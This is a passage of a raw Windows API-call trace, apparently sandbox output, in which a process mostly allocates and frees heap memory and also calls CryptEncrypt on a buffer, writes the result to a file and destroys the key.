[0215.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0215.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0215.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0215.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0215.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e509c8 [0215.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e509c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0215.764] CryptEncrypt (in: hKey=0xa87310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2a528*, pdwDataLen=0x8cef60*=0x21a2, dwBufLen=0x21a8 | out: pbData=0x2f2a528*, pdwDataLen=0x8cef60*=0x21a8) returned 1 [0215.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0215.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0215.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0215.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0215.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0215.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0215.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0215.765] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0215.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0215.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0215.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0215.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0215.766] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.766] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0215.766] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0215.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0215.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0215.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0215.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0215.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0215.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0215.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0215.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0215.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0215.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0215.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0215.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0215.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x21a8) returned 0x2f2c6d8 [0215.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0215.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0215.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0215.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0215.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0215.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0215.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0215.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0215.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0215.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0215.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0215.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0215.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x21a8) returned 0x2f2e888 [0215.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2c6d8 | out: hHeap=0x970000) returned 1 [0215.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0215.816] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0215.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0215.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0215.816] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0215.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0215.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0215.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0215.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0215.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0215.817] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0215.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0215.817] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0215.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0215.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0215.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0215.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0215.817] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0215.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0215.817] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0215.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0215.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0215.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0215.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0215.818] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0215.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0215.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0215.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0215.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0215.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0215.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0215.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0215.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0215.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0215.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0215.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0215.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0215.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0215.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0215.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0215.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0215.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0215.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0215.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0215.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0215.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0215.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0215.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0215.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0215.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0215.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0215.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0215.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0215.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0215.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0215.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0215.819] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0215.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0215.819] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0215.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0215.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0215.819] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0215.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0215.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0215.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0215.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0215.820] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0215.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0215.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0215.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0215.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0215.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0215.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0215.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0215.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0215.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0215.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0215.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0215.820] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0215.820] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0215.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0215.820] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0215.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0215.822] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.822] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0215.822] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.822] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f261c8*, nNumberOfBytesToWrite=0x21a8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f261c8*, lpNumberOfBytesWritten=0x8cf5e4*=0x21a8, lpOverlapped=0x0) returned 1 [0215.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0215.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f261c8 | out: hHeap=0x970000) returned 1 [0215.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0215.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0215.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0215.824] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.824] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.825] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0215.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0215.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0215.825] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.825] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0215.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0215.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0215.825] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0215.825] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0215.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50938, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0215.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0215.826] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0215.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0215.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0215.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0215.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0215.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0215.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0215.826] CryptDestroyKey (hKey=0xa87310) returned 1 [0215.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0215.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0215.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0215.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0215.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0215.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0215.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0215.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0215.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0215.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0215.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0215.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0215.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0215.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0215.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0215.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0215.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0215.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0215.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0215.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0215.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0215.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0215.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0215.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0215.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0215.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0215.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0215.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0215.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0215.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0215.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0215.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0215.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0215.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0215.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0215.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0215.828] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0215.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0215.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0215.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0215.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0215.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0215.828] RtlAllocateHeap 